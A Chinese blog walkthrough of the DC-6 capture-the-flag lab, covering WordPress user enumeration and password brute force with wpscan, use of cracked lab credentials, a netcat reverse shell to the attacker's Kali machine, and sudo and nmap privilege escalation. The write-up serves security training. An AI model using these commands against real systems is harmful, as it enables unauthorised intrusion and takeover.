码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • DC-6靶场下载及渗透实战详细过程(DC靶场系列)


    目录

    一. 信息收集

    1. 主机扫描

    2. 端口扫描

    3. 目录扫描

    4. 页面信息探测

    二. 渗透过程

    1. 用户名枚举

    2. 爆破密码

    3. 任意命令执行

    4. 提权

    5. 查找flag


    DC-6靶场下载地址https://www.five86.com/downloads/DC-6.zip

    一. 信息收集

    1. 主机扫描

    2. 端口扫描

    3. 目录扫描

    4. 页面信息探测

     这里跟DC-2的情况一样,无法直接访问靶机主页面,得修改本地host重定向到wordy

    在/etc/hosts文件下,添加

    192.168.120.140 wordy

    CMS是WordPress5.1.1,这里我们就可以利用针对工具wpscan进行渗透了

    二. 渗透过程

    1. 用户名枚举

    wpscan --url wordy -e u 

    将得到的用户名,保存在一个文件里,方便稍后爆破

    2. 爆破密码

    根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典

    cat /usr/share/wordlists/rockyou.txt | grep k01 > /root/桌面/passwd.txt

    生成字典后,继续使用wpscan进行爆破

    wpscan --url wordy -U uname.txt -P passwd.txt

    成功爆破出一个用户

    mark:helpdesk01 

    访问wp-login.php用该账号密码登入后台

    3. 任意命令执行

    burpsuite抓包,放到重复器, 修改报文

    发现有命令回显,存在任意命令执行漏洞,接着我们反弹shell到kali上,先在kali监听端口9999

    nc -lvp 9999

     然后执行下面命令进行反弹shell

    nc -e /bin/bash 192.168.120.129 9999

    反弹shell成功,然后升级交互shell

    python -c "import pty;pty.spawn('/bin/bash')"

    4. 提权

    之前打DC靶场能用的提权方式都试过了,不行,但跟上一关一样,在home目录下找到提示

    得到一个账号,graham:Gso7isUM1D4

    su graham

     在找提权方法时发现

    发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件

    这是解压某个文件的操作,我们可以利用该文件,切换为jens用户

    echo "/bin/bash" > b*
    sudo -u jens ./*

     

    发现可以利用nmap进行提权,参考nmap提权,先创建个文件

    "os.execute('/bin/bash')" > shell

    然后利用--script参数

    sudo nmap --script=shell

    提权成功

    5. 查找flag

    find / -name *flag.*

      

     拿到flag

  • 相关阅读:
    37.JavaScript对象与JSON格式的转换,JSON.stringify、JSON.parse方法的使用方法和注意事项
    英伟达发布世界最大芯片Blackwell GPU:开启AI计算新纪元
    TCP通信实战案例-即时通信
    使用Postman并发测试接口&关于RedisTemplate线程安全的一些理解
    基于Keras版本YOLOV7模型的锂电池自燃预警烟雾检测实践
    C语言十六弹 --求两个整数二进制位不同的位数
    设A和B是两个单链表(带头结点),其中元素递增有序。设计一个算法从A和B中的公共元素产生新链表C,要求不破坏A,B。
    ADRC/Matlab一步步实现跟踪微分器TD(附完整PLC测试代码链接)
    MySQL日志管理、备份与恢复
    linux 使用 navicat 报错的各种问题
  • 原文地址:https://blog.csdn.net/l2872253606/article/details/126062386
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号